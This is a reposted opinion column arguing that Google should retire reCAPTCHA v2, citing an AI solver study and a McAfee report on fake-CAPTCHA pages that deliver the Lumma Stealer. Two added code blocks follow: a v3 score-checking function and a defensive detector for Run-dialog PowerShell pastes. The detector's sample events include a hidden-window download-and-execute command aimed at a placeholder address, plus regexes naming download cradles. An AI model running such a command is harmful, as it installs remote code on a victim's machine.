Google, it’s time to kill CAPTCHAS
Thursday 3 October 2024, 12:00, by ComputerWorld
Are you a robot? Google really, really wants to know.
The answer to this question is demanded of web users about 200 million times a day via CAPTCHAs, "Completely Automated Public Turing tests to tell Computers and Humans Apart." The term was coined at Carnegie Mellon University; the dominant implementation, reCAPTCHA, is owned and operated by Google. Google got into the CAPTCHA game in 2009 when it acquired reCAPTCHA, a small company founded by Carnegie Mellon researchers. And Google's intentions for the technology were brilliant.

Google wanted CAPTCHAs to test whether users were human or bots to protect websites from spam and fraud, but with a twist. Instead of the original, deliberately distorted letters (readable by people but not by the bots of the day), it served accidentally distorted ones: ambiguous words from scans in the Google Books Library Project. If most users identified a blurry letter as an "E," that reading was confirmed or corrected in the digital book scan. The vision was to get the world's web users to work for free, transcribing text while also thwarting malicious bots. Google later used reCAPTCHA for human identification of ambiguous Street View and Maps imagery, including house numbers, street signs, and business names. More recently, the challenges have fed Google's broader AI work in maps, computer vision, speech recognition, and security.

There are many kinds of CAPTCHAs: text-based, image-based, audio, math problems, word problems, time-based, honeypot, picture identification, and invisible. The most common are the click-the-checkbox CAPTCHA and the click-every-picture-that-contains-a-bus CAPTCHA. Both are Google's reCAPTCHA v2. Google's most recent version, reCAPTCHA v3, scores each request on behavioral signals and returns that score to the website instead of posing a challenge; the user is never forced to stop and solve a puzzle. This approach makes sense and doesn't stop users in their tracks to solve Google's recognition problems.

So why do we still see the old reCAPTCHA v2 challenges everywhere, every day?
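To make the v2/v3 difference concrete before the reasons that follow, here is an added example (my code, not Google's and not from the article). A v3 widget hands the site a token; the site posts it to Google's siteverify endpoint; the JSON that comes back carries a 0.0 to 1.0 score plus the action, hostname and issue timestamp, not a pass/fail. The function below turns such a response into allow, challenge or deny, with an explicit v2 puzzle as the middle option. The sample responses are constructed so the code runs offline, and the thresholds, the expected hostname and the two-minute token age are this example's assumptions.

```python
import json
from datetime import datetime, timedelta, timezone
from typing import Optional

# Site policy. The thresholds, the expected hostname and the token age are
# assumptions of this example, not values Google prescribes.
EXPECTED_HOSTNAME = "example.com"
MAX_TOKEN_AGE = timedelta(minutes=2)   # v3 tokens are only verifiable for about two minutes
ALLOW_SCORE = 0.7                      # score >= ALLOW_SCORE: let the request through silently
CHALLENGE_SCORE = 0.3                  # CHALLENGE_SCORE <= score < ALLOW_SCORE: show a v2 puzzle


def decide(siteverify_json: str, expected_action: str,
           now: Optional[datetime] = None) -> str:
    """Map a reCAPTCHA v3 siteverify response to 'allow', 'challenge' or 'deny'.

    The field names (success, score, action, challenge_ts, hostname, error-codes)
    are the ones /recaptcha/api/siteverify returns; the policy is this example's.
    """
    r = json.loads(siteverify_json)
    now = now or datetime.now(timezone.utc)
    if not r.get("success"):
        return "deny"        # invalid, already-used or expired token, or wrong secret
    if r.get("hostname") != EXPECTED_HOSTNAME:
        return "deny"        # token was minted for some other site
    if r.get("action") != expected_action:
        return "deny"        # token harvested from a different form and replayed here
    try:
        issued = datetime.fromisoformat(r["challenge_ts"].replace("Z", "+00:00"))
    except (KeyError, ValueError):
        return "deny"
    if now - issued > MAX_TOKEN_AGE:
        return "deny"        # stale verdict
    score = float(r.get("score", 0.0))
    if score >= ALLOW_SCORE:
        return "allow"
    if score >= CHALLENGE_SCORE:
        return "challenge"   # the v2 fallback: make this user click the buses
    return "deny"


NOW = datetime(2024, 10, 3, 12, 0, 0, tzinfo=timezone.utc)


def _resp(**overrides) -> str:
    """Constructed siteverify response (not a real capture) with per-case overrides."""
    base = {"success": True, "score": 0.9, "action": "login",
            "challenge_ts": "2024-10-03T11:59:30Z", "hostname": "example.com"}
    base.update(overrides)
    return json.dumps(base)


SAMPLES = {
    "clean_browser":   _resp(score=0.9),
    "suspicious":      _resp(score=0.4),
    "bot_like":        _resp(score=0.1),
    "wrong_host":      _resp(hostname="evil.example.net"),
    "replayed_action": _resp(action="signup"),
    "stale_token":     _resp(challenge_ts="2024-10-03T11:50:00Z"),
    "invalid_token":   json.dumps({"success": False,
                                   "error-codes": ["invalid-input-response"]}),
}


def demo() -> dict:
    """Decision for every sample, evaluated at the fixed NOW so results are stable."""
    return {name: decide(body, "login", now=NOW) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:16s} -> {verdict}")
```

The hostname and action checks matter as much as the score: a token with a good score is still worthless if it was minted on another domain or harvested from a different form on the same site, and each token is valid for a single siteverify call, so replaying a captured verdict is the bot's cheapest move. This is the "interpret risk scores" work that a v2 checkbox spares the site operator.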
One reason is that reCAPTCHA v2 is simpler for website owners to implement and manage. The widget returns a pass or a fail; there is no risk score to interpret or threshold to tune. It's also more tangible to website owners because they can see it, whereas v3 operates invisibly in the background. It also has more customizable options and uses fewer cookies. Even website owners who use v3 deploy v2 as a fallback, either for especially suspicious traffic or when the v3 engine can't capture enough data to score a request. While using reCAPTCHA v2 has clear benefits, two events in September radically changed the cost-benefit analysis.

AI defeats reCAPTCHA

Researchers from ETH Zurich published a paper on Sept. 13 demonstrating that an AI model built from off-the-shelf object-detection components can solve Google's reCAPTCHA v2 image challenges with 100% accuracy. The study shows that current AI technologies can effectively exploit advanced image-based CAPTCHAs like reCAPTCHA v2: any malicious actor anywhere in the world can implement an automated bot that gets past the challenges. Humans "prove they're human" with 71-85% accuracy. Machines now do it with 100% accuracy. Obviously, reCAPTCHA v2 is obsolete.

reCAPTCHA is a security threat

The antivirus company McAfee reported on Sept. 20 that it had discovered a new malware campaign that uses fake CAPTCHA challenges. The fraudulent CAPTCHA pages are promoted on shady websites claiming to offer cracked versions of popular games such as Black Myth: Wukong, Cities: Skylines II, and Hogwarts Legacy. The fake "verification" step silently copies a PowerShell command to the clipboard and instructs the user to press a sequence of keys; that sequence opens the Run dialog, pastes the command and executes it, and the command downloads and installs the Lumma Stealer infostealer. The same fraudulent CAPTCHA pages are also linked from phishing emails disguised as GitHub notifications about a fake "security vulnerability." One reason the phony CAPTCHA scam works is that CAPTCHAs are so ubiquitous. We've all been trained like lab rodents to engage with them, so it's easy to convince the public to follow one more set of instructions.
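The chain McAfee describes leaves a distinctive trace on the endpoint: a PowerShell process whose parent is explorer.exe (which is how a Win+R Run-dialog launch shows up in process telemetry) with a hidden-window, policy-bypass, encoded or download-cradle command line. The following is an added detection example, not McAfee's or the article's code. The events are constructed JSON-lines records that borrow Sysmon Event ID 1 field names, the documentation-range address 203.0.113.10 and the base64 blob are placeholders, and the two-category threshold is an assumption to tune per environment.

```python
import json
import re
from typing import Dict, List

# Indicator categories for the clipboard one-liner a fake CAPTCHA page asks the victim
# to paste into the Run dialog. One regex per category; a launch is flagged when at
# least MIN_CATEGORIES categories match, so a lone "-w hidden" does not page anyone.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass":   re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile"
        r"|net\.webclient|curl|wget)\b", re.I),
    "inline_eval":     re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url":      re.compile(r"https?://", re.I),
}
POWERSHELL = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
EXPLORER = re.compile(r"\\explorer\.exe$", re.I)
MIN_CATEGORIES = 2   # assumption; tune to the environment's false-positive tolerance


def detect_clickfix(events_jsonl: str, min_categories: int = MIN_CATEGORIES) -> List[Dict]:
    """Scan JSON-lines process-creation events and return the launches that look like a
    fake-CAPTCHA paste: PowerShell started by explorer.exe (the parent of anything run
    from the Win+R dialog) with a command line hitting several indicator categories."""
    findings = []
    for line in events_jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if not POWERSHELL.search(ev.get("Image", "")):
            continue
        if not EXPLORER.search(ev.get("ParentImage", "")):
            continue   # cmd/scheduler-parented PowerShell belongs to a broader rule, not this one
        cmd = ev.get("CommandLine", "")
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if len(hits) >= min_categories:
            findings.append({"user": ev.get("User"), "indicators": hits, "command": cmd})
    return findings


# Constructed events (not real telemetry) using Sysmon Event ID 1 field names.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    # 1: the fake-CAPTCHA paste: hidden window, policy bypass, download cradle, iex, URL
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": "LAB\\alice",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr -useb http://203.0.113.10/verify.txt)"'},
    # 2: same idea with the payload base64-encoded so no cradle keyword is visible
    #    (the blob is a placeholder, not a decodable payload)
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": "LAB\\carol",
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAEkAVwBSACAAaAB0AHQAcAA6AC8ALwAyADAAMwAuADAALgAxADEAMwAuADEAMAApAA=="},
    # 3: a user simply opening a shell from the Start menu
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": "LAB\\bob",
     "CommandLine": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'},
    # 4: an admin script with a bypass flag, but parented by cmd.exe, not the Run dialog
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS, "User": "LAB\\ops",
     "CommandLine": "powershell -ep bypass -File C:\\ops\\rotate-logs.ps1"},
    # 5: one indicator only (hidden window) on a local script: below threshold
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": "LAB\\bob",
     "CommandLine": 'powershell -w hidden -File "C:\\Users\\bob\\backup.ps1"'},
])


if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f["user"], f["indicators"], f["command"], sep="  |  ")
```

Only events 1 and 2 are flagged: event 3 has no indicators, event 4 is skipped because its parent is cmd.exe, and event 5 hits a single category. Lowering the threshold to one would surface event 5 as well, which is the trade-off the threshold exists for. On real Sysmon or EDR exports (converted to one JSON object per line) the natural companion signal is a browser writing to the clipboard seconds before the launch.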
The social engineering trick simply hijacks an existing, widespread habit. The ubiquity of CAPTCHAs is itself an exploitable security weakness.

In the past few weeks, it's become clear that reCAPTCHA v2 is both breakable by AI and a serious security risk. But the biggest problem with reCAPTCHA v2 has existed for years.

Unconscionable exploitation of users

I can't stand reCAPTCHA v2 challenges. As a research-obsessed journalist, I open hundreds or thousands of web pages daily. I've bookmarked hundreds of pages of news searches, which I open every day to stay informed about my far-flung technical beats. I churn through web pages at high speed, hunting for information. Plus, I use a lot of browser extensions. I'm also a digital nomad, traveling globally and constantly accessing random Wi-Fi networks in airports, cafes, restaurants, Airbnbs, and elsewhere. I often need to pretend (for some US services) to be in the United States, so of course, I use a VPN. Each aspect of how I use the web and Google Search is deemed "suspicious," so CAPTCHA challenges are constantly arresting my work momentum.

I'm an online speed freak. I've spent thousands of dollars on my laptop solely for performance. I don't want anything slowing me down. So, for Google to stop me in my tracks and make me identify buses, stairs, and crosswalks a hundred times a day while I'm in the writing "zone" is vexing to an extreme. Google literally steals my time every day.

And it's not just me. reCAPTCHA v2 is deployed on nearly three million websites, including over one-third of the top 100,000 sites. During the 13 years reCAPTCHA has been around, people have collectively spent 819 million hours solving its challenges, corresponding to at least $6.1 billion in unpaid wages for that labor, according to a study by researchers at the University of California, Irvine.
The researchers note that Google might have profited by as much as $888 billion from cookies created by reCAPTCHA sessions, and that it could monetize CAPTCHA activity by tracking users, gathering behavioral data, and building user profiles for advertising. (Google denied this, saying reCAPTCHA v2 user data is used only to improve the service.) The researchers also estimate that reCAPTCHA traffic has consumed about 134 petabytes of bandwidth, burning roughly 7.5 million kWh of energy and producing 7.5 million pounds of CO2.

Google: It's time to pull the plug

Enough already with the CAPTCHAs that force users to stop and take a test! It's a massive, unpaid exploitation of users for Google's gain. The technology is easily defeated by AI. And the very existence of the CAPTCHA concept is now being exploited by malicious actors. While reCAPTCHA v3 is probably much better, it's now clear that reCAPTCHA v2 is beatable by AI, a security risk, and a giant pain in the ass for millions of people. Google has killed more than 296 products since 2006, according to the Google Graveyard. It's time for Google to kill again.
https://www.computerworld.com/article/3542859/google-its-time-to-kill-captchas.html